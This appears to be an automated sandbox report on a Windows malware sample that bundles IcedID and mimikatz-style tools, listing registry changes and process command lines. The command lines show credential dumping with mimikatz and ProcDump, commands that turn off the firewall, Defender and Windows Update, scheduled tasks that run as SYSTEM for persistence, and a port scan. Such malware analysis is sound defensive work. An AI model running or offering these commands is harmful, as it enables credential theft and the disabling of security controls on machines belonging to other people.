wrribqi.exektitzriiz.exektitzriiz.exektitzriiz.exektitzriiz.exektitzriiz.exektitzriiz.exektitzriiz.exektitzriiz.exektitzriiz.exektitzriiz.exektitzriiz.exektitzriiz.exektitzriiz.exektitzriiz.exektitzriiz.exektitzriiz.exektitzriiz.exektitzriiz.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	wrribqi.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ktitzriiz.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ktitzriiz.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ktitzriiz.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ktitzriiz.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	wrribqi.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ktitzriiz.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ktitzriiz.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ktitzriiz.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ktitzriiz.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ktitzriiz.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ktitzriiz.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ktitzriiz.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ktitzriiz.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ktitzriiz.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ktitzriiz.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ktitzriiz.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ktitzriiz.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	ktitzriiz.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	wrribqi.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	ktitzriiz.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals	ktitzriiz.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ktitzriiz.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ktitzriiz.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ktitzriiz.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ktitzriiz.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ktitzriiz.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	wrribqi.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	wrribqi.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ktitzriiz.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ktitzriiz.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ktitzriiz.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ktitzriiz.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ktitzriiz.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ktitzriiz.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ktitzriiz.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ktitzriiz.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ktitzriiz.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ktitzriiz.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ktitzriiz.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ktitzriiz.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ktitzriiz.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ktitzriiz.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ktitzriiz.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	wrribqi.exe

Modifies registry class 14 IoCs

Processes:

wrribqi.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.bat\	wrribqi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.js\	wrribqi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile"	wrribqi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile"	wrribqi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile"	wrribqi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile"	wrribqi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\	wrribqi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\	wrribqi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile"	wrribqi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\	wrribqi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile"	wrribqi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile"	wrribqi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\	wrribqi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.reg\	wrribqi.exe

Runs net.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

4904 PING.EXE

pid	process
4904	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

wrribqi.exe

pid	process
4340	wrribqi.exe
4340	wrribqi.exe
4340	wrribqi.exe
4340	wrribqi.exe
4340	wrribqi.exe
4340	wrribqi.exe
4340	wrribqi.exe
4340	wrribqi.exe
4340	wrribqi.exe
4340	wrribqi.exe
4340	wrribqi.exe
4340	wrribqi.exe
4340	wrribqi.exe
4340	wrribqi.exe
4340	wrribqi.exe
4340	wrribqi.exe
4340	wrribqi.exe
4340	wrribqi.exe
4340	wrribqi.exe
4340	wrribqi.exe
4340	wrribqi.exe
4340	wrribqi.exe
4340	wrribqi.exe
4340	wrribqi.exe
4340	wrribqi.exe
4340	wrribqi.exe
4340	wrribqi.exe
4340	wrribqi.exe
4340	wrribqi.exe
4340	wrribqi.exe
4340	wrribqi.exe
4340	wrribqi.exe
4340	wrribqi.exe
4340	wrribqi.exe
4340	wrribqi.exe
4340	wrribqi.exe
4340	wrribqi.exe
4340	wrribqi.exe
4340	wrribqi.exe
4340	wrribqi.exe
4340	wrribqi.exe
4340	wrribqi.exe
4340	wrribqi.exe
4340	wrribqi.exe
4340	wrribqi.exe
4340	wrribqi.exe
4340	wrribqi.exe
4340	wrribqi.exe
4340	wrribqi.exe
4340	wrribqi.exe
4340	wrribqi.exe
4340	wrribqi.exe
4340	wrribqi.exe
4340	wrribqi.exe
4340	wrribqi.exe
4340	wrribqi.exe
4340	wrribqi.exe
4340	wrribqi.exe
4340	wrribqi.exe
4340	wrribqi.exe
4340	wrribqi.exe
4340	wrribqi.exe
4340	wrribqi.exe
4340	wrribqi.exe

Suspicious behavior: LoadsDriver 15 IoCs

Processes:

pid process

672
672
672
672
672
672
672
672
672
672
672
672
672
672
672
Suspicious behavior: RenamesItself 1 IoCs

Processes:

2024-05-03_5e6a68f105d95ba6c52387c649436358_hacktools_icedid_mimikatz.exe

pid process

3520 2024-05-03_5e6a68f105d95ba6c52387c649436358_hacktools_icedid_mimikatz.exe

pid	process
672
672
672
672
672
672
672
672
672
672
672
672
672
672
672

Suspicious use of AdjustPrivilegeToken 24 IoCs

Processes:

2024-05-03_5e6a68f105d95ba6c52387c649436358_hacktools_icedid_mimikatz.exewrribqi.exewrribqi.exevfshost.exektitzriiz.execitubz.exektitzriiz.exektitzriiz.exektitzriiz.exektitzriiz.exektitzriiz.exektitzriiz.exektitzriiz.exektitzriiz.exektitzriiz.exektitzriiz.exektitzriiz.exektitzriiz.exektitzriiz.exektitzriiz.exektitzriiz.exektitzriiz.exektitzriiz.exe

description	pid	process
Token: SeDebugPrivilege	3520	2024-05-03_5e6a68f105d95ba6c52387c649436358_hacktools_icedid_mimikatz.exe
Token: SeDebugPrivilege	2768	wrribqi.exe
Token: SeDebugPrivilege	4340	wrribqi.exe
Token: SeDebugPrivilege	5024	vfshost.exe
Token: SeDebugPrivilege	3544	ktitzriiz.exe
Token: SeLockMemoryPrivilege	5032	citubz.exe
Token: SeLockMemoryPrivilege	5032	citubz.exe
Token: SeDebugPrivilege	3472	ktitzriiz.exe
Token: SeDebugPrivilege	816	ktitzriiz.exe
Token: SeDebugPrivilege	1800	ktitzriiz.exe
Token: SeDebugPrivilege	1332	ktitzriiz.exe
Token: SeDebugPrivilege	5080	ktitzriiz.exe
Token: SeDebugPrivilege	628	ktitzriiz.exe
Token: SeDebugPrivilege	2364	ktitzriiz.exe
Token: SeDebugPrivilege	3860	ktitzriiz.exe
Token: SeDebugPrivilege	4048	ktitzriiz.exe
Token: SeDebugPrivilege	1844	ktitzriiz.exe
Token: SeDebugPrivilege	4128	ktitzriiz.exe
Token: SeDebugPrivilege	1996	ktitzriiz.exe
Token: SeDebugPrivilege	4808	ktitzriiz.exe
Token: SeDebugPrivilege	1948	ktitzriiz.exe
Token: SeDebugPrivilege	4032	ktitzriiz.exe
Token: SeDebugPrivilege	464	ktitzriiz.exe
Token: SeDebugPrivilege	1940	ktitzriiz.exe

Suspicious use of SetWindowsHookEx 12 IoCs

Processes:

2024-05-03_5e6a68f105d95ba6c52387c649436358_hacktools_icedid_mimikatz.exewrribqi.exewrribqi.exexohudmc.exeqicmew.exewrribqi.exewrribqi.exe

pid	process
3520	2024-05-03_5e6a68f105d95ba6c52387c649436358_hacktools_icedid_mimikatz.exe
3520	2024-05-03_5e6a68f105d95ba6c52387c649436358_hacktools_icedid_mimikatz.exe
2768	wrribqi.exe
2768	wrribqi.exe
4340	wrribqi.exe
4340	wrribqi.exe
2300	xohudmc.exe
3532	qicmew.exe
652	wrribqi.exe
652	wrribqi.exe
572	wrribqi.exe
572	wrribqi.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

2024-05-03_5e6a68f105d95ba6c52387c649436358_hacktools_icedid_mimikatz.execmd.exewrribqi.execmd.execmd.exewpcap.exenet.exenet.exenet.exe

description	pid	process	target process
PID 3520 wrote to memory of 5080	3520	2024-05-03_5e6a68f105d95ba6c52387c649436358_hacktools_icedid_mimikatz.exe	cmd.exe
PID 3520 wrote to memory of 5080	3520	2024-05-03_5e6a68f105d95ba6c52387c649436358_hacktools_icedid_mimikatz.exe	cmd.exe
PID 3520 wrote to memory of 5080	3520	2024-05-03_5e6a68f105d95ba6c52387c649436358_hacktools_icedid_mimikatz.exe	cmd.exe
PID 5080 wrote to memory of 4904	5080	cmd.exe	PING.EXE
PID 5080 wrote to memory of 4904	5080	cmd.exe	PING.EXE
PID 5080 wrote to memory of 4904	5080	cmd.exe	PING.EXE
PID 5080 wrote to memory of 2768	5080	cmd.exe	wrribqi.exe
PID 5080 wrote to memory of 2768	5080	cmd.exe	wrribqi.exe
PID 5080 wrote to memory of 2768	5080	cmd.exe	wrribqi.exe
PID 4340 wrote to memory of 780	4340	wrribqi.exe	cmd.exe
PID 4340 wrote to memory of 780	4340	wrribqi.exe	cmd.exe
PID 4340 wrote to memory of 780	4340	wrribqi.exe	cmd.exe
PID 780 wrote to memory of 3164	780	cmd.exe	cmd.exe
PID 780 wrote to memory of 3164	780	cmd.exe	cmd.exe
PID 780 wrote to memory of 3164	780	cmd.exe	cmd.exe
PID 780 wrote to memory of 1616	780	cmd.exe	cacls.exe
PID 780 wrote to memory of 1616	780	cmd.exe	cacls.exe
PID 780 wrote to memory of 1616	780	cmd.exe	cacls.exe
PID 780 wrote to memory of 2476	780	cmd.exe	cmd.exe
PID 780 wrote to memory of 2476	780	cmd.exe	cmd.exe
PID 780 wrote to memory of 2476	780	cmd.exe	cmd.exe
PID 780 wrote to memory of 1072	780	cmd.exe	cacls.exe
PID 780 wrote to memory of 1072	780	cmd.exe	cacls.exe
PID 780 wrote to memory of 1072	780	cmd.exe	cacls.exe
PID 780 wrote to memory of 3732	780	cmd.exe	cmd.exe
PID 780 wrote to memory of 3732	780	cmd.exe	cmd.exe
PID 780 wrote to memory of 3732	780	cmd.exe	cmd.exe
PID 780 wrote to memory of 2204	780	cmd.exe	cacls.exe
PID 780 wrote to memory of 2204	780	cmd.exe	cacls.exe
PID 780 wrote to memory of 2204	780	cmd.exe	cacls.exe
PID 4340 wrote to memory of 1068	4340	wrribqi.exe	netsh.exe
PID 4340 wrote to memory of 1068	4340	wrribqi.exe	netsh.exe
PID 4340 wrote to memory of 1068	4340	wrribqi.exe	netsh.exe
PID 4340 wrote to memory of 2064	4340	wrribqi.exe	netsh.exe
PID 4340 wrote to memory of 2064	4340	wrribqi.exe	netsh.exe
PID 4340 wrote to memory of 2064	4340	wrribqi.exe	netsh.exe
PID 4340 wrote to memory of 1660	4340	wrribqi.exe	netsh.exe
PID 4340 wrote to memory of 1660	4340	wrribqi.exe	netsh.exe
PID 4340 wrote to memory of 1660	4340	wrribqi.exe	netsh.exe
PID 4340 wrote to memory of 3152	4340	wrribqi.exe	cmd.exe
PID 4340 wrote to memory of 3152	4340	wrribqi.exe	cmd.exe
PID 4340 wrote to memory of 3152	4340	wrribqi.exe	cmd.exe
PID 3152 wrote to memory of 1928	3152	cmd.exe	wpcap.exe
PID 3152 wrote to memory of 1928	3152	cmd.exe	wpcap.exe
PID 3152 wrote to memory of 1928	3152	cmd.exe	wpcap.exe
PID 1928 wrote to memory of 352	1928	wpcap.exe	net.exe
PID 1928 wrote to memory of 352	1928	wpcap.exe	net.exe
PID 1928 wrote to memory of 352	1928	wpcap.exe	net.exe
PID 352 wrote to memory of 3044	352	net.exe	net1.exe
PID 352 wrote to memory of 3044	352	net.exe	net1.exe
PID 352 wrote to memory of 3044	352	net.exe	net1.exe
PID 1928 wrote to memory of 3568	1928	wpcap.exe	net.exe
PID 1928 wrote to memory of 3568	1928	wpcap.exe	net.exe
PID 1928 wrote to memory of 3568	1928	wpcap.exe	net.exe
PID 3568 wrote to memory of 4992	3568	net.exe	net1.exe
PID 3568 wrote to memory of 4992	3568	net.exe	net1.exe
PID 3568 wrote to memory of 4992	3568	net.exe	net1.exe
PID 1928 wrote to memory of 4512	1928	wpcap.exe	net.exe
PID 1928 wrote to memory of 4512	1928	wpcap.exe	net.exe
PID 1928 wrote to memory of 4512	1928	wpcap.exe	net.exe
PID 4512 wrote to memory of 2156	4512	net.exe	net1.exe
PID 4512 wrote to memory of 2156	4512	net.exe	net1.exe
PID 4512 wrote to memory of 2156	4512	net.exe	net1.exe
PID 1928 wrote to memory of 548	1928	wpcap.exe	net.exe

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:1820

C:\Windows\TEMP\pkiileske\citubz.exe
"C:\Windows\TEMP\pkiileske\citubz.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5032

C:\Users\Admin\AppData\Local\Temp\2024-05-03_5e6a68f105d95ba6c52387c649436358_hacktools_icedid_mimikatz.exe
"C:\Users\Admin\AppData\Local\Temp\2024-05-03_5e6a68f105d95ba6c52387c649436358_hacktools_icedid_mimikatz.exe"
1⤵
- Drops file in Windows directory
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3520

C:\Windows\SysWOW64\cmd.exe
cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\etfblrkh\wrribqi.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:5080

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 5
3⤵
- Runs ping.exe
PID:4904

C:\Windows\etfblrkh\wrribqi.exe
C:\Windows\etfblrkh\wrribqi.exe
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2768

C:\Windows\etfblrkh\wrribqi.exe
C:\Windows\etfblrkh\wrribqi.exe
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Sets file execution options in registry
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4340

C:\Windows\SysWOW64\cmd.exe
cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
2⤵
- Suspicious use of WriteProcessMemory
PID:780

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:3164

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\drivers\etc\hosts /T /D users
3⤵
PID:1616

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:2476

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
3⤵
PID:1072

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:3732

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
3⤵
PID:2204

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static del all
2⤵
PID:1068

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add policy name=Bastards description=FuckingBastards
2⤵
PID:2064

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filteraction name=BastardsList action=block
2⤵
PID:1660

C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Windows\yfuzwlflh\ezuhehlec\wpcap.exe /S
2⤵
- Suspicious use of WriteProcessMemory
PID:3152

C:\Windows\yfuzwlflh\ezuhehlec\wpcap.exe
C:\Windows\yfuzwlflh\ezuhehlec\wpcap.exe /S
3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1928

C:\Windows\SysWOW64\net.exe
net stop "Boundary Meter"
4⤵
- Suspicious use of WriteProcessMemory
PID:352

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "Boundary Meter"
5⤵
PID:3044

C:\Windows\SysWOW64\net.exe
net stop "TrueSight Meter"
4⤵
- Suspicious use of WriteProcessMemory
PID:3568

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "TrueSight Meter"
5⤵
PID:4992

C:\Windows\SysWOW64\net.exe
net stop npf
4⤵
- Suspicious use of WriteProcessMemory
PID:4512

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop npf
5⤵
PID:2156

C:\Windows\SysWOW64\net.exe
net start npf
4⤵
PID:548

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start npf
5⤵
PID:1484

C:\Windows\SysWOW64\cmd.exe
cmd /c net start npf
2⤵
PID:4852

C:\Windows\SysWOW64\net.exe
net start npf
3⤵
PID:2768

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start npf
4⤵
PID:3948

C:\Windows\SysWOW64\cmd.exe
cmd /c net start npf
2⤵
PID:2476

C:\Windows\SysWOW64\net.exe
net start npf
3⤵
PID:3516

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start npf
4⤵
PID:780

C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Windows\yfuzwlflh\ezuhehlec\bilmicikh.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\yfuzwlflh\ezuhehlec\Scant.txt
2⤵
PID:3728

C:\Windows\yfuzwlflh\ezuhehlec\bilmicikh.exe
C:\Windows\yfuzwlflh\ezuhehlec\bilmicikh.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\yfuzwlflh\ezuhehlec\Scant.txt
3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1068

C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Windows\yfuzwlflh\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\yfuzwlflh\Corporate\log.txt
2⤵
- Drops file in Windows directory
PID:3888

C:\Windows\yfuzwlflh\Corporate\vfshost.exe
C:\Windows\yfuzwlflh\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5024

C:\Windows\SysWOW64\cmd.exe
cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "atfbcgbkf" /ru system /tr "cmd /c C:\Windows\ime\wrribqi.exe"
2⤵
PID:2648

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:3792

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /sc minute /mo 1 /tn "atfbcgbkf" /ru system /tr "cmd /c C:\Windows\ime\wrribqi.exe"
3⤵
- Creates scheduled task(s)
PID:5040

C:\Windows\SysWOW64\cmd.exe
cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "lrclezizh" /ru system /tr "cmd /c echo Y|cacls C:\Windows\etfblrkh\wrribqi.exe /p everyone:F"
2⤵
PID:2656

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:4992

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /sc minute /mo 1 /tn "lrclezizh" /ru system /tr "cmd /c echo Y|cacls C:\Windows\etfblrkh\wrribqi.exe /p everyone:F"
3⤵
- Creates scheduled task(s)
PID:5000

C:\Windows\SysWOW64\cmd.exe
cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "epzfgqshg" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\pkiileske\citubz.exe /p everyone:F"
2⤵
PID:2908

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:1020

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /sc minute /mo 1 /tn "epzfgqshg" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\pkiileske\citubz.exe /p everyone:F"
3⤵
- Creates scheduled task(s)
PID:4564

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
2⤵
PID:4872

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
2⤵
PID:3672

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
2⤵
PID:4512

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static set policy name=Bastards assign=y
2⤵
PID:5100

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
2⤵
PID:4788

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
2⤵
PID:1424

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
2⤵
PID:4048

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static set policy name=Bastards assign=y
2⤵
PID:1072

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
2⤵
PID:3732

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
2⤵
PID:2020

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
2⤵
PID:1344

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static set policy name=Bastards assign=y
2⤵
PID:3188

C:\Windows\SysWOW64\cmd.exe
cmd /c net stop SharedAccess
2⤵
PID:4428

C:\Windows\SysWOW64\net.exe
net stop SharedAccess
3⤵
PID:2988

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SharedAccess
4⤵
PID:4448

C:\Windows\SysWOW64\cmd.exe
cmd /c netsh firewall set opmode mode=disable
2⤵
PID:1308

C:\Windows\SysWOW64\netsh.exe
netsh firewall set opmode mode=disable
3⤵
- Modifies Windows Firewall
PID:4520

C:\Windows\SysWOW64\cmd.exe
cmd /c netsh Advfirewall set allprofiles state off
2⤵
PID:2356

C:\Windows\SysWOW64\netsh.exe
netsh Advfirewall set allprofiles state off
3⤵
- Modifies Windows Firewall
PID:3864

C:\Windows\SysWOW64\cmd.exe
cmd /c net stop MpsSvc
2⤵
PID:2908

C:\Windows\SysWOW64\net.exe
net stop MpsSvc
3⤵
PID:3668

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MpsSvc
4⤵
PID:3244

C:\Windows\SysWOW64\cmd.exe
cmd /c net stop WinDefend
2⤵
PID:4920

C:\Windows\SysWOW64\net.exe
net stop WinDefend
3⤵
PID:2996

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop WinDefend
4⤵
PID:1508

C:\Windows\SysWOW64\cmd.exe
cmd /c net stop wuauserv
2⤵
PID:5040

C:\Windows\SysWOW64\net.exe
net stop wuauserv
3⤵
PID:3468

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop wuauserv
4⤵
PID:548

C:\Windows\SysWOW64\cmd.exe
cmd /c sc config MpsSvc start= disabled
2⤵
PID:724

C:\Windows\SysWOW64\sc.exe
sc config MpsSvc start= disabled
3⤵
- Launches sc.exe
PID:2868

C:\Windows\SysWOW64\cmd.exe
cmd /c sc config SharedAccess start= disabled
2⤵
PID:1932

C:\Windows\SysWOW64\sc.exe
sc config SharedAccess start= disabled
3⤵
- Launches sc.exe
PID:3160

C:\Windows\SysWOW64\cmd.exe
cmd /c sc config WinDefend start= disabled
2⤵
PID:1780

C:\Windows\SysWOW64\sc.exe
sc config WinDefend start= disabled
3⤵
- Launches sc.exe
PID:1416

C:\Windows\SysWOW64\cmd.exe
cmd /c sc config wuauserv start= disabled
2⤵
PID:628

C:\Windows\SysWOW64\sc.exe
sc config wuauserv start= disabled
3⤵
- Launches sc.exe
PID:4424

C:\Windows\TEMP\xohudmc.exe
C:\Windows\TEMP\xohudmc.exe
2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
PID:2300

C:\Windows\TEMP\yfuzwlflh\ktitzriiz.exe
C:\Windows\TEMP\yfuzwlflh\ktitzriiz.exe -accepteula -mp 832 C:\Windows\TEMP\yfuzwlflh\832.dmp
2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3544

C:\Windows\TEMP\yfuzwlflh\ktitzriiz.exe
C:\Windows\TEMP\yfuzwlflh\ktitzriiz.exe -accepteula -mp 428 C:\Windows\TEMP\yfuzwlflh\428.dmp
2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3472

C:\Windows\TEMP\yfuzwlflh\ktitzriiz.exe
C:\Windows\TEMP\yfuzwlflh\ktitzriiz.exe -accepteula -mp 1820 C:\Windows\TEMP\yfuzwlflh\1820.dmp
2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:816

